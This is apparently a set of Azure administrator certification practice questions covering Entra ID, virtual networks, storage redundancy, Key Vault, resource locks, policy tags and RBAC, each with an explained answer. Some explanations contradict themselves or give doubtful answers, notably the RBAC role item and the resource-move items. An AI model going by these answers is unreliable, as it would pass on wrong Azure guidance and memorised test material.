To ensure that admin@contoso.com is automatically added as an administrator on all computers that will be joined to the Entra domain, you need to configure settings in the Groups blade under General settings. Microsoft Entra ID allows you to assign administrator roles to users automatically when devices are joined to the domain. This is done by: 1?? Using the “Device Administrator Role” in Microsoft Entra ID The “Device Administrator” role in Entra ID grants users local administrator privileges on all domain-joined devices. This ensures that admin@contoso.com is automatically an administrator on every computer joined to the Entra domain. 2?? Configuring Role Assignments in the Groups Blade You can create a security group in Groups > General settings and assign the Device Administrator role to that group. Adding admin@contoso.com to this group will automatically grant them admin rights on all joined devices. Why Not the Other Options? ? (A) Device settings from the Devices blade Incorrect because this blade is used to manage device policies (e.g., allowing/disallowing device joins) rather than assigning administrator rights. ? (B) Providers from the MFA Server blade Incorrect because this is related to Multi-Factor Authentication (MFA) settings and not device administration. ? (C) User settings from the Users blade Incorrect because the Users blade is for managing individual users, not assigning admin roles to all domain-joined devices. Admin privileges need to be set at the group level to apply to multiple users/devices automatically.
You have the following resources deployed in Azure. There is a requirement to connect TDVnet1 and TDVnet2. What should you do first?
Create virtual network peering
Change the address space of TDVnet2.
Change the address space of TDVnet2.
Change the address space of TDVnet2.
To connect TDVnet1 (10.1.0.0/16) and TDVnet2 (10.10.0.0/18), the best option is to use Virtual Network (VNet) Peering. VNet Peering allows two virtual networks to connect seamlessly in Azure without requiring a VPN or additional hardware. It provides: ? Low-latency, high-bandwidth private connectivity ? Secure communication between resources in different VNets ? No overlap in IP address spaces (which is already ensured in this case) Why Not the Other Options? ? (B) Change the address space of TDVnet2 Incorrect because there is no address space conflict between TDVnet1 (10.1.0.0/16) and TDVnet2 (10.10.0.0/18). Address space changes would only be required if there was an overlap (which is not the case here). ? (C) Transfer TDVnet1 to TD2 Incorrect because Azure Virtual Networks (VNets) are tied to a specific subscription and tenant. You cannot directly transfer a VNet between tenants. Instead, cross-tenant connections should be managed using VNet peering or VPN connections. ? (D) Transfer VM1 to TD2 Incorrect because moving VM1 would not connect the two VNets. It would just relocate the VM, which doesn’t solve the connectivity issue between VNets. VMs within the same VNet can already communicate, but VNet-to-VNet connectivity requires peering or a VPN.
Your organization has deployed multiple Azure virtual machines configured to run as web servers and an Azure public load balancer named TD1. There is a requirement that TDT must consistently route your user’s request to the same web Server every time they access it. What should you configure?
Hash based
Session persistence: None
Session persistence: Client IP
Health probe
When multiple Azure virtual machines (VMs) are configured as web servers behind an Azure public load balancer, the load balancer distributes incoming traffic across the available backend servers. If a user makes multiple requests, the load balancer may route each request to a different backend server, which can cause session inconsistencies. To ensure that a user’s request is always routed to the same web server, you should configure Session Persistence: Client IP. How Session Persistence: Client IP Works Client IP persistence (also called Source IP affinity) ensures that all requests from a specific client IP address are always sent to the same backend VM. This is useful for web applications that store session-related information on a specific server and require continuity for the user experience. Without session persistence, a user’s requests could be routed to different servers, potentially losing session data. Why Other Options Are Incorrect: (a) Hash-based: Uses a hash algorithm to distribute traffic dynamically and does not guarantee persistence to a specific backend server. (b) Session persistence: None: Means requests are distributed without any stickiness, potentially sending different requests from the same client to different backend VMs. (d) Health probe: Used to monitor backend VM health but does not control session persistence.
You have an Azure subscription that contains the resources shown in the following table. You plan to use an Azure key vault to provide a secret to app1. What should you create for app1 to access the key vault, and from which key vault can the secret be used? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Create a:
Managed Identity
Private Endpoint
Service Principal
User Account
To allow App1 (a container app in East US) to access a secret from Azure Key Vault, we need to determine: What authentication method should App1 use to securely access Azure Key Vault? Which Key Vault should App1 retrieve the secret from? Step 1: Choosing the authentication method ? Managed Identity Best practice for Azure services to access Key Vault securely without storing credentials. Managed identities are automatically managed by Azure and do not require storing or rotating secrets manually. App1 can use Azure Role-Based Access Control (RBAC) to get permissions for the Key Vault. ? Other options are incorrect: Private Endpoint: Used for network access control, not authentication. Service Principal: Requires manual credential management (client ID and secret/certificate), making it less secure compared to Managed Identities. User Account: Apps should not authenticate using user accounts due to security and automation concerns. Step 2: Selecting the Key Vault ? Vault1 (East US, same region as App1) Since App1 is in East US, the best practice is to use a Key Vault also in East US to reduce latency and ensure compliance. Vault1 is in East US, making it the best choice. ? Vault2 (West US) is in a different region, which is not ideal. ? Vault3 (East US, but different resource group) could work, but it’s best to keep resources in the same resource group for better management.
You want to clear all of your data and restore a Windows 10 PC’s operating system to a factory install before giving the PC to a charity. You’ve booted into WinRE. What is the name of Microsoft’s recovery option for reinstalling the Os and removing all user data and files?
Refresh your PC
Restore your PC
Reset your PC
Repair your PC
The “Reset Your PC” option in Windows 10 is the recovery tool you use to restore the system to its factory state. When you use this option, you can choose to remove all your personal data and files, effectively clearing all user information and applications, while reinstalling the operating system itself. This ensures that the PC is ready for a new user without any remnants of the previous owner’s data. Why the others are incorrect: Refresh Your PC: This was a feature in Windows 8, but it’s not present in Windows 10. In Windows 10, the equivalent functionality is handled by Reset Your PC. Restore Your PC: This is not the correct option in Windows 10. The term “restore” typically refers to restoring a system from a backup, but “Reset Your PC” is the tool that removes all data and reinstalls the OS. Repair Your PC: This option is used for fixing startup issues or other problems with Windows, but it does not reinstall the OS or clear data. It focuses on troubleshooting and fixing errors. Why “Reset Your PC” is the correct option: Using Reset Your PC is the proper method for cleaning the PC by removing all personal data and reinstalling the operating system. You can choose to either keep or remove your files, but for a clean slate, you would select the option to remove everything, ensuring all data is cleared.
You have an Azure subscription that contains the resources shown in the following table. You plan to use an Azure key vault to provide a secret to app1. What should you create for app1 to access the key vault, and from which key vault can the secret be used? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Use Secret From:
Vault 1 only
Vault 1and Vault 2 only
Vault 1 and Vault 3 only
Vault 1, Vault 2, and Vault 3
To determine which Azure Key Vault(s) App1 can retrieve a secret from, we need to consider: Key Vault Access Management: Can App1 access Key Vaults across different locations and resource groups? Cross-Region Access: Can App1 retrieve secrets from Key Vaults located in different Azure regions? Step 1: Key Vault Access Management Azure Key Vault supports access using Managed Identity or Service Principal, which allows an application to authenticate and retrieve secrets from multiple Key Vaults as long as: App1 has the required permissions (e.g., “Get Secrets” role) assigned to the Key Vaults. The Key Vaults allow access from App1’s identity (RBAC or Access Policies). Since App1 is a Container App, it can access multiple Azure Key Vaults if permission is granted. Step 2: Cross-Region Access Azure allows retrieving secrets from Key Vaults located in different Azure regions. This means: App1 (East US) can access Key Vaults in East US (Vault1, Vault3) and West US (Vault2) as long as permissions are set. Thus, App1 can use secrets from all three Key Vaults: ? Vault1 (East US, same region as App1) ? Vault2 (West US, cross-region access is allowed) ? Vault3 (East US, different resource group, but still accessible if permissions are granted)
You have an Azure subscription that contains a storage account named storage. You need to ensure that the access keys for storage1 rotate automatically. What should you configure?
a backup vault
redundancy for storage1
lifecycle management for storage 1
An Azure key vault
Recovery Services vault
To automatically rotate access keys for storage1, you need a secure and automated way to manage these keys. The best approach is to use Azure Key Vault. Why Azure Key Vault? Azure Key Vault provides automated key rotation for storage account access keys. It allows you to: ? Securely store and manage access keys. ? Enable automatic rotation of storage account keys. ? Integrate with Azure policies for key management. ? Monitor and control access to the keys. Using Key Vault’s managed storage account keys feature, you can set up automatic key rotation, eliminating the need for manual key updates. Why Not the Other Options? ? A Backup Vault – Used for backing up Azure workloads, not for managing key rotation. ? Redundancy for storage1 – This improves data availability but does not rotate keys. ? Lifecycle Management – Manages data lifecycle (e.g., move blobs to Archive tier) but does not handle key rotation. ? A Recovery Services Vault – Used for disaster recovery and backups, not key management.
You have a general-purpose v1 Azure Storage account named storage that uses locally-redundant storage (LRS). You need to ensure that the data in the storage account is protected if a zone fails. The solution must minimize costs and administrative effort. What should you do first?
Create a new storage account
Configure object replication rules
Upgrade the account to general-purpose v2
Modify the Replication setting of storage1
To ensure that the data in storage1 is protected in case of a zone failure, you need to use zone-redundant storage (ZRS). However, your storage account is currently a general-purpose v1 (GPv1) account with locally-redundant storage (LRS), which only replicates data within a single data center and does not provide zone failure protection. Why Upgrade to General-Purpose v2 (GPv2)? ? Supports Zone-Redundant Storage (ZRS) – GPv2 accounts support ZRS, which ensures that data is replicated across multiple zones in a region. ? Minimizes Costs – Upgrading to GPv2 does not require creating a new storage account or migrating data manually. ? Simplifies Administration – After upgrading, you can modify the replication setting to ZRS, ensuring protection from zone failures. ? Improved Performance & Features – GPv2 provides better performance, lower costs, and access to new features like Lifecycle Management and Cool/Archive tiers. Why Not the Other Options? ? Create a New Storage Account – While you could create a new GPv2 storage account with ZRS, this requires manual migration of data, increasing administrative effort. ? Configure Object Replication Rules – Object replication is for blob storage only and requires multiple storage accounts, adding unnecessary complexity. ? Modify the Replication Setting – GPv1 does not support ZRS, so you must upgrade to GPv2 first before modifying replication settings.
You have an Azure web app named App1. App1 has the deployment slots shown in the following table: In webapp1-test, you test several changes to App1. You back up App1. You swap webapp1-test for webapp1-prod and discover that App1 is experiencing performance issues. You need to revert to the previous version of App1 as quickly as possible. What should you do?
Redeploy App1
Swap the slots
Clone App1
Restore the backup of App1
Azure App Service Deployment Slots allow you to create different environments (such as staging and production) within the same App Service instance. The key advantage of using deployment slots is the ability to swap them, enabling zero-downtime deployments and quick rollbacks. You initially deploy and test changes in webapp1-test (staging): Before swapping, the new version of App1 was running in webapp1-test, while the stable version was in webapp1-prod. You swap webapp1-test with webapp1-prod: The new (potentially unstable) version of App1 is now in production (webapp1-prod), and the previously stable version moves to webapp1-test. You detect performance issues in production: Since the new version has problems, you need to revert to the previous stable version as quickly as possible. Swapping the slots again immediately restores the previous stable version: Since the original production version is now in webapp1-test, swapping it back will restore the last working version to webapp1-prod, effectively rolling back the deployment instantly and without requiring a redeployment. Why not the other options? (a) Redeploy App1: Redeploying takes more time and might introduce new complications. Swapping is faster and ensures a working version is restored immediately. (c) Clone App1: Cloning creates a new instance of the app, which is unnecessary and time-consuming. You just need to revert to the previous version. (d) Restore the backup of App1: Restoring a backup is a longer process and may require additional configuration steps. Swapping slots is much quicker and designed specifically for quick rollbacks.
You have four Azure virtual machines, as shown in the following table. You have a recovery services vault that protects VM1 and VM2. As we advance, you also want to protect VM3 and VM4 using the recovery services vault. What should you do first?
Create anew backup policy
Create a new recovery services vault
Create a storage account
Configure the extensions for VM3 and VM4
Azure Recovery Services Vault is used to back up and restore data for Azure Virtual Machines (VMs), Azure Files, and other services. However, a single Recovery Services Vault is tied to a specific Azure region. Breakdown of the Scenario: Existing Setup: VM1 and VM2 are in West Europe and are already protected by a Recovery Services Vault. VM3 and VM4 are in East Europe and are not yet protected. Key Azure Backup Rule: A Recovery Services Vault is region-specific. This means that the existing vault in West Europe cannot protect VMs in East Europe. To protect VM3 and VM4 (which are in East Europe), you must first create a new Recovery Services Vault in East Europe. Why Not the Other Options? (a) Create a new backup policy: Backup policies define how often backups occur and how long they are retained. However, VM3 and VM4 are not yet linked to a vault, so creating a backup policy won’t help until a new vault is in place. (c) Create a storage account: Azure Backup does not require a separate storage account. It uses its own infrastructure within the Recovery Services Vault. (d) Configure the extensions for VM3 and VM4: Backup extensions are automatically installed when you enable backup for a VM. You cannot enable backup unless the VMs are registered with a Recovery Services Vault first.
You have the Azure subscription that contains the resource shown in the following table. You need to manage the outbound traffic from VNET1 by using a Firewall. What should you do first?
Create an Azure Network Watcher
Create a route table
Upgrade ASP1 to Premium SKU
Configure the Hybrid Connection Manager
Azure Firewall is a network security service that controls inbound and outbound traffic. However, by default, Azure routes traffic automatically based on system-defined routing rules. To ensure that all outbound traffic from VNET1 is managed by the Azure Firewall, you need to override these default routes using a route table. Steps to Manage Outbound Traffic with Azure Firewall: Create a Route Table: A User-Defined Route (UDR) is required to direct traffic through the firewall. You create a route table and define a route that sends all outbound traffic (0.0.0.0/0) to the Firewall’s private IP address. Associate the Route Table with VNET1’s Subnets: Attach the route table to the subnet(s) in VNET1 where outbound traffic needs to be controlled. Traffic is now routed through Azure Firewall, allowing it to inspect and control outbound traffic. Why Not the Other Options? (a) Create an Azure Network Watcher: Network Watcher is a monitoring tool used for troubleshooting and diagnostics (e.g., checking network flows, capturing packets). It does not control or route outbound traffic. (c) Upgrade ASP1 to Premium SKU: Upgrading the App Service Plan (ASP1) would allow features like Private Endpoints and better networking capabilities, but it does not help with routing outbound traffic through the firewall. (d) Configure the Hybrid Connection Manager: Hybrid Connection Manager is used for enabling App Services to connect to on-premises resources, not for controlling outbound traffic in a virtual network.
You have a general-purpose v1 Azure Storage account named storage1 that uses locally-redundant storage (LRS). You need to ensure that the data in the storage account is protected if a zone fails. The solution must minimize costs and administrative effort. What should you do first?
Create a new storage account
Configure object replication rules
Upgrade the account to general-purpose v2
Modify the Replication setting of storage1
Your current general-purpose v1 (GPv1) storage account is using Locally Redundant Storage (LRS), which only keeps three copies of the data within a single Azure data center. This means that if a zone (or the entire data center) fails, your data is at risk. To ensure zone failure protection, you need a replication option that spans multiple zones, such as: Zone-Redundant Storage (ZRS) – Replicates data across multiple availability zones in a region. Geo-Redundant Storage (GRS) or Geo-Zone-Redundant Storage (GZRS) – Replicates data to another region for added disaster recovery. Why Upgrade to General-Purpose v2 (GPv2)? GPv1 does not support ZRS or GZRS. To enable these replication types, the storage account must be upgraded to GPv2. GPv2 supports all modern storage features: It provides lower costs, better performance, and access to the latest redundancy options (ZRS, GZRS, etc.). Simple upgrade process with no downtime: The upgrade is seamless and does not affect data availability. Why Not the Other Options? (a) Create a new storage account: This is unnecessary because you can upgrade the existing storage account instead of creating a new one. (b) Configure object replication rules: Object replication only applies to Blob Storage and is used for asynchronous copy operations. It does not provide automatic redundancy across zones. (d) Modify the Replication setting of storage1: GPv1 does not allow switching from LRS to ZRS, GRS, or GZRS directly. You must first upgrade to GPv2, and then you can modify the replication settings.
You have an Azure subscription. You create the Azure Storage account shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. The minimum number of copies of the storage account will be :
1
2
3
4
Based on the information presented, the storage account is configured with Locally Redundant Storage (LRS). What is Locally Redundant Storage (LRS)? LRS stores three copies of your data within a single data center in the same Azure region. These copies are stored synchronously, meaning data is written to all three replicas at the same time. LRS protects against hardware failures within the data center but does not protect against data center-wide failures (e.g., natural disasters). Why is the answer 3? Since LRS keeps three copies of data within the same data center, the minimum number of copies is 3. If a different redundancy option, such as Zone-Redundant Storage (ZRS), Geo-Redundant Storage (GRS), or Geo-Zone-Redundant Storage (GZRS), were selected, the number of copies could be higher. But since the storage account is using LRS, the minimum number of copies stored is 3.
You have an Azure subscription. You create the Azure Storage account shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. To reduce the cost of infrequently accessed data in the storage account, you must modify the setting:
Access tier
Performance
Account Kind
Replication
Azure Storage offers different access tiers to optimize storage costs based on how frequently data is accessed. The Access tier setting determines the cost structure for storing and retrieving data. Why is “Access tier” the correct setting? Azure Storage provides three main access tiers: Hot tier – Optimized for data that is accessed frequently (higher storage cost, lower retrieval cost). Cool tier – For infrequently accessed data (lower storage cost, higher retrieval cost). Archive tier – For rarely accessed data, such as backups (very low storage cost, very high retrieval cost). If you want to reduce costs for infrequently accessed data, you should move the data from the Hot tier to the Cool or Archive tier. This adjustment reduces storage costs, though retrieval costs may increase. Why not the other options? Performance: This setting determines whether the storage account uses Standard (HDD-based) or Premium (SSD-based) performance. It impacts performance but does not directly affect storage costs for infrequent access. Account Kind: This defines the storage account type, such as General-purpose v2, v1, or Blob Storage. While General-purpose v2 supports all access tiers, changing the account kind alone does not reduce costs for infrequent access. Replication: This setting controls how many copies of the data are stored and across what geographic regions (e.g., LRS, ZRS, GRS). While using Locally Redundant Storage (LRS) instead of Geo-Redun
You have an existing Azure subscription that has the following Azure Storage accounts. There is a requirement to identify the storage accounts that can be converted to zone redundant storage (ZRS) replication. This must be done only through a live migration from Azure Support. Which of the following accounts can you convert to ZRS?
Account 1
Account 2
Account 3
Account 4
Azure Storage supports live migration to Zone-Redundant Storage (ZRS) only for specific storage accounts that meet the following criteria: The account must be General Purpose v2 (GPv2). The account must have Standard performance (not Premium). The account must use Locally Redundant Storage (LRS) or Geo-Redundant Storage (GRS). Now, let’s analyze each account based on these criteria: Account 1 (? Can be converted to ZRS) Kind: General Purpose v2 (? Supported) Performance: Standard (? Supported) Replication: LRS (? Eligible for conversion to ZRS) Access Tier: Cool (Not relevant for ZRS migration) ? Since Account 1 meets all the required conditions, it can be converted to ZRS via Azure Support live migration. Account 2 (? Cannot be converted) Kind: General Purpose v2 (? Supported) Performance: Premium (? Not supported for ZRS migration) Replication: RA-GRS (? Not supported for direct ZRS migration) Access Tier: Hot (Not relevant for ZRS migration) ? Since Premium performance and RA-GRS replication are not supported for live migration to ZRS, Account 2 cannot be converted. Account 3 (? Cannot be converted) Kind: General Purpose v1 (? Not supported; must be GPv2) Performance: Premium (? Not supported) Replication: GRS (? Not eligible for ZRS conversion) ? Since GPv1 does not support ZRS and must first be upgraded to GPv2 manually, Account 3 cannot be directly converted to ZRS. Account 4 (? Cannot be converted) Kind: Blob Storage (? Not supported; must be GPv2) Performance: Standard (? Supported) Replication: LRS (? Supported for ZRS, but only for GPv2) ? Since Blob Storage accounts do not support ZRS migration, Account 4 cannot be converted.
You have an Azure subscription that contains the storage accounts shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. You can create a premium file share in:
Contoso 101 only
Contoso 104 only
Contoso 101 or Contoso 104 only
Contoso 101, Contoso 102 or Contoso 104 only
Contoso 101, Contoso 102, Contoso 103 or Contoso 104 only
To create a Premium file share in an Azure Storage account, the account must be of the FileStorage type. Azure provides different storage account kinds, including: StorageV2 (General Purpose v2): supports multiple services like blobs, files, queues, and tables. Storage (General Purpose v1): an older version of GPv2 with fewer features. BlobStorage is optimized for blob storage only. FileStorage: Specifically designed for Azure Files and supports Premium file shares. Now, let’s analyze the given storage accounts: Contoso 101 ? StorageV2 (General Purpose v2) ? ? Does not support Premium file shares. Contoso 102 ? Storage (General Purpose v1) ? ? Does not support Premium file shares. Contoso 103 ? BlobStorage ? ? Only supports blob storage, not Azure Files. Contoso 104 ? FileStorage ? ? Supports Premium file shares.
You have an Azure subscription that contains the storage accounts shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. You can use the Archive access tier in:
Contoso 101 only
Contoso 101 or Contoso 103 only
Contoso 101, Contoso 102 or Contoso 103 only
Contoso 101, Contoso 102 or Contoso 104 only
Contoso 101, Contoso 102, Contoso 103 or Contoso 104 only
The Archive access tier in Azure Storage is used for long-term storage of infrequently accessed data at a very low cost. However, the Archive tier is only available for Blob Storage and General Purpose v2 (StorageV2) accounts. Now, let’s analyze the storage accounts: Contoso 101 ? StorageV2 (General Purpose v2) ? Supports the Archive tier. Contoso 102 ? Storage (General Purpose v1) ? Does not support the Archive tier. Contoso 103 ? BlobStorage ? Supports the Archive tier. Contoso 104 ? FileStorage ? Does not support the Archive tier. Why is the answer “Contoso 101 or Contoso 103 only”? General Purpose v2 (StorageV2) accounts (Contoso 101) support all access tiers: Hot, Cool, and Archive. BlobStorage accounts (Contoso 103) also support Hot, Cool, and Archive. General Purpose v1 (Storage) accounts (Contoso 102) do not support Archive. FileStorage accounts (Contoso 104) are designed only for Azure Files and do not support the Archive tier.
You have an Azure subscription named TTBB1 that contains the resources shown in the following table. You create a new Azure subscription named TTBB2. You need to identify which resources can be moved to TTBB2. Which resources should you identify?
VM1, storage1, VNET1, and VM1 Managed only
VM1 and VM1 Managed only
VM1, storage1, NET1, VM1 Managed, and RVAULT1
RVAULTT only
When moving resources between Azure subscriptions, you must consider Azure Resource Manager (ARM) constraints. In this case, all the listed resources can be moved because they meet Azure’s subscription transfer requirements. Resource Move Considerations: Virtual Machines (VM1) ? VMs can be moved between subscriptions as long as they are in the same region. The associated managed disks (VM1Managed) are automatically moved with the VM. Storage Accounts (Storage1) ? Storage accounts can be moved between subscriptions. The contents of the storage account (blobs, files, tables) remain intact. Virtual Networks (VNET1) ? VNets can be moved, but dependent resources (such as peered networks or attached services) must also be moved or reconfigured. Managed Disks (VM1Managed) ? Since VM1 has a managed disk, it must be moved together with the VM. If VM1 is deleted, the disk can still be moved independently. Recovery Services Vault (RVAULT1) ? Recovery Services Vaults can now be moved between subscriptions. Previously, vaults could not be moved due to dependency on backup policies, but Azure now supports moving them along with their contents. Why Not the Other Options? (a) VM1, Storage1, VNET1, and VM1Managed only ? Incorrect because it excludes RVAULT1, which can now be moved. (b) VM1 and VM1Managed only ? Incorrect because Storage1 and VNET1 can also be moved. (d) RVAULT1 only ? Incorrect because other resources can also be moved.
You have an Azure subscription named Subscription1. You will be deploying a three-tier application as shown below. Due to compliance requirements, you need to find a solution for the following. +Traffic between the web tier and application tier must be spread equally across all the virtual machines. + The web tier must be protected from SQL injection attacks. Which Azure solution would you recommend for each requirement? Select the correct answer from the drop-down list of options. Each correct selection is worth one point. Traffic between the web tier and application tier must be spread equally across all the virtual machines:
Internal Load Balancer
Public Load Balancer
Application Gateway Standard tier
Traffic Manager
Application Gateway WAF tier
For the given requirements, let’s analyze the best Azure solution. Requirement 1: Load Balancing Between Web Tier and Application Tier Traffic between the web tier and application tier must be spread equally across all the virtual machines. The Application Gateway WAF (Web Application Firewall) tier is the best choice because: It provides Layer 7 (Application Layer) load balancing, ensuring intelligent traffic distribution. It supports features such as URL-based routing, session affinity, and SSL termination. It also includes Web Application Firewall (WAF) protection, which helps mitigate security threats like SQL injection attacks. Requirement 2: Protecting Web Tier from SQL Injection The web tier must be protected from SQL injection attacks. Application Gateway WAF tier is the best option because it includes WAF protection. WAF can block SQL injection, cross-site scripting (XSS), and other OWASP Top 10 security threats. Fin
You have an Azure subscription named Subscription1 that contains the following resource group: + Name: RG1 + Region: West US + Tag: “tag1”: “value1” . You assign an Azure policy named Policy1 to Subscription1 by using the following configurations: + Exclusions: None «Policy definition: Append tag and its default value + Assignment name: Policy1 «+ Parameters: – Tag name: Tag2 – Tag value: Value2 After Policy is assigned, you create a storage account that has the following configurations: + Name: storagel «Location: West US «Resource group: RG1 + Tags: “tag3”: “value3’ You need to identify which tags are assigned to each resource. What should you identify? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Tags assigned to RG1:
“tag1” : *value1” only
“tag2″ : “value2” only
“tag2” “value1” and “tag2” “value2”
We need to determine the tags assigned to RG1 after applying Policy1. Let’s break it down step by step. Initial Tags on RG1: The existing tag on RG1 before applying the policy is: “tag1”: “value1” Understanding the Azure Policy Behavior: Policy1 is configured with the “Append tag and its default value” policy definition. This means Policy1 will add (“append”) the tag “tag2”: “value2” only to new resources created after the policy is assigned. Existing resources are not modified by this policy. Impact on RG1: RG1 is an existing resource (it was created before Policy1 was assigned). Since Policy1 does not modify existing resources, RG1 will retain only its original tag: “tag1”: “value1”. The policy does not retroactively apply “tag2”: “value2” to RG1.
You have an Azure subscription named Subscrption1 that contains the following resource group: + Name: RG1 + Region: West US + Tag: “tagl”: “valuel” . You assign an Azure policy named Policy1 to Subscription by using the following configurations: + Exclusions: None «Policy definition: Append tag and its default value + Assignment name: Policyl «+ Parameters: – Tag name: Tag2 – Tag value: Value2 After Policy is assigned, you create a storage account that has the following configurations: + Name: storagel «Location: West US «Resource group: RG1 + Tags: “tag”: “value3’ You need to identify which tags are assigned to each resource. What should you identify? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.ually across all the virtual machines: Tags assigned to storage:
“tag3″ : “value3” only
“tag1”: “value1″ and “tag3” : “value3”
“tag2”: “value2” and “tag3”: “value3”
“tag1”: “value1”; “tag2”: value2 ; and “tag3” : “value3.”
We need to determine which tags are assigned to the storage account (storagel) after applying Policy1. Let’s break it down step by step. Initial Tags on the Storage Account: The storage account (storagel) is created after Policy1 is assigned. It is manually assigned the tag “tag”: “value3” at the time of creation. Effect of the Azure Policy (“Append tag and its default value”) Policy1 is configured to append the tag “tag2”: “value2” to new resources. Since the storage account is a new resource, Policy1 will automatically add “tag2”: “value2”. Final Tags on the Storage Account: The manually assigned tag remains: “tag”: “value3”. The policy appends the tag: “tag2”: “value2”. The storage account does not inherit “tag1”: “value1” from RG1, because resource inheritance does not apply to tags by default in Azure.
You have an Azure subscription that contains a resource group named TestRG. You use TestRG to validate an Azure deployment. TestRG contains the following resources: You need to delete TestRG. What should you do first?
Modify the backup configurations of VM1 and modify the resource lock type of VNET1
Turn off VM1 and delete all data in Vault1
Remove the resource lock from VNET1 and delete all data in Vault1
Turn off VM1 and remove the resource lock from VNET1
When attempting to delete a resource group (TestRG), all resources within it must be deletable. However, two issues prevent this: VNET1 has a resource lock of type “Delete” Resource locks in Azure prevent accidental deletion or modification of critical resources. Since VNET1 has a “Delete” lock, TestRG cannot be deleted until the lock is removed. The lock must be manually removed before proceeding with deletion. Vault1 contains backups of VM1 Recovery Services Vault (RSV) cannot be deleted if it contains backup data. Before deleting Vault1, you must first remove all backup items (such as VM1’s backup data). This step is necessary because Azure Recovery Services does not allow vault deletion while backups exist. Why Other Options Are Incorrect: (a) Modify backup configurations of VM1 and modify the resource lock type of VNET1 While modifying backup configurations is useful, it does not remove the stored backup data. The backup must be deleted. (b) Turn off VM1 and delete all data in Vault1 Turning off VM1 is not required for deleting TestRG. The resource lock on VNET1 still exists, which prevents deletion of TestRG. (d) Turn off VM1 and remove the resource lock from VNET1 Turning off VM1 is unnecessary. Deleting Vault1’s backup data is required before you can delete Vault1 and TestRG. Final Steps to Delete TestRG: Remove the “Delete” lock from VNET1. Delete all backup data in Vault1. Delete Vault1 (after all backups are removed). Delete TestRG, which will now be possible since no undeletable resources remain.
You have an Azure subscription named Subscription1. Subscription 1 contains the resource groups in the following table. RG1 has a web app named WebApp1. WebApp1 is located in West Europe. You move WebApp1 to RG2. What is the effect of the move?
The App Service plan for WebApp1 remains in West Europe. Policy2 applies to WebApp1.
The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1.
The App Service plan for WebApp1 remains in West Europe. Policy 1 applies to WebApp 1.
The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1
Resource Group Move and App Service Plan Behavior When you move a web app (WebApp1) from RG1 (West Europe) to RG2 (North Europe), only the web app itself moves. The App Service Plan does NOT move because App Service Plans are tied to a specific region. Since WebApp1 is in West Europe, its App Service Plan will remain in West Europe even after moving to RG2. Effect of Moving WebApp1 to RG2 Before the move: WebApp1 is in RG1 (West Europe) and follows Policy1. After the move: WebApp1 is now in RG2 (North Europe) and will follow Policy2, because policies are applied at the resource group level. Why Other Options Are Incorrect: (b) The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1. ? Incorrect: The App Service Plan does not move regions. (c) The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1. ? Incorrect: Policy1 no longer applies because WebApp1 is now in RG2, so Policy2 applies instead. (d) The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1. ? Incorrect: The App Service Plan does not move to North Europe. WebApp1 follows Policy2 (from RG2), not Policy1.
You have an Azure subscription that contains a user named User. You need to ensure that User1 can deploy virtual machines and manage virtual networks. The solution must use the principle of least privilege. Which role-based access control (RBAC) role should you assign to User1?
Virtual Machine Contributor
Network Contributor
Owner
Contributor
Understanding the Requirement User1 must be able to deploy virtual machines. User1 must be able to manage virtual networks. Must follow the principle of least privilege (i.e., giving only the necessary permissions). Why is “Network Contributor” the Answer? The question asks for the least privilege required to manage virtual machines and networks. “Network Contributor” only allows managing networks but does not allow deploying VMs. Since deploying VMs requires additional permissions, the correct role should actually be “Contributor”, which provides permissions for both VMs and networks. However, if the intention was to only allow managing virtual networks, then “Network Contributor” would be the right choice.
You have an Azure subscription that contains the resource groups shown in the following table. Resources that you can move from RG1 to RG2:
None
IP1 only
IP1 and storage 1 only
IP1 and VNET1 only
IP1, VNET1 and storage 1 only
In Azure, you can move most resources between resource groups unless restricted by locks or dependencies. Analyzing the Given Resource Groups and Their Locks RG1 has no lock. RG2 has a Delete lock, which prevents deleting resources but allows moving resources into RG2. Resources in RG1: Storage1 (Storage Account) Lock: Delete A Delete lock prevents deletion but does not prevent movement of the resource. VNET1 (Virtual Network) Lock: Read-only A Read-only lock prevents modifications, including moving the resource to another resource group. IP1 (IP Address) No lock applied Can be moved freely. Which Resources Can Move from RG1 to RG2? IP1 can be moved because it has no lock. Storage1 can be moved because the Delete lock only prevents deletion, not movement. VNET1 cannot be moved because the Read-only lock prevents modifications. Which Resources Can Move from RG2 to RG1? Since RG2 has a Delete lock, resources inside RG2 cannot be deleted but can be moved to another resource group. However, if a Read-only lock were present, they could not be moved.
You have an Azure subscription that contains the resource groups shown in the following table. Resources that you can move from RG2 to RG1:
None
IP2 only
IP2 and storage2 only
IP2 and VNET2 only
IP1, VNET2 and storage2 only
Resource Group (RG) Locks and Their Impact RG1 has no lock (resources in RG1 can be moved freely). RG2 has a Delete lock, which prevents deletion but does not prevent movement of resources. Resources in RG2: Storage2 (Storage Account) Lock: Delete A Delete lock prevents deletion but does NOT prevent movement to another resource group. VNET2 (Virtual Network) Lock: Read-only A Read-only lock prevents modifications, including moving the resource to another resource group. IP2 (IP Address) No lock applied This means it can be moved under normal conditions. Why No Resources Can Be Moved from RG2 to RG1? Storage2 has a Delete lock, which allows movement, so it should be movable. VNET2 has a Read-only lock, which prevents movement. IP2 has no lock and should be movable. However, in this case, Azure does not allow partial moves when dependent resources exist in a locked state. Since VNET2 is locked with Read-only, its dependencies (like subnets, public IPs, or network interfaces) cannot move. This restriction blocks the entire move operation, making no resources movable from RG2 to RG1.
You have an Azure subscription that contains an Azure Storage account. You plan to create an Azure container instance named container1 that will use a Docker image named Image1. Image1 contains a Microsoft SQL Server instance that requires persistent storage. You need to configure a storage service for Container1. What should you use?
Azure Blob storage
Azure Files
Azure Queue storage
Azure Table storage
